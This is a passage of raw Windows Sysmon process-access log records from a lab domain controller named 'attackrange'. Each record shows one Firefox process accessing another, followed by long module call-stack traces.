Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000018498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.390{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.390{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.154{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000018495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.154{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.154{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.029{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000018492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.029{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.029{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.123{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.123{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.123{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.123{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.123{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.123{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.123{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.076{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.076{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.076{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.076{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.076{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.076{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.045{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc 10341000x800000000000000018511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.045{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea 10341000x800000000000000018510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.045{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 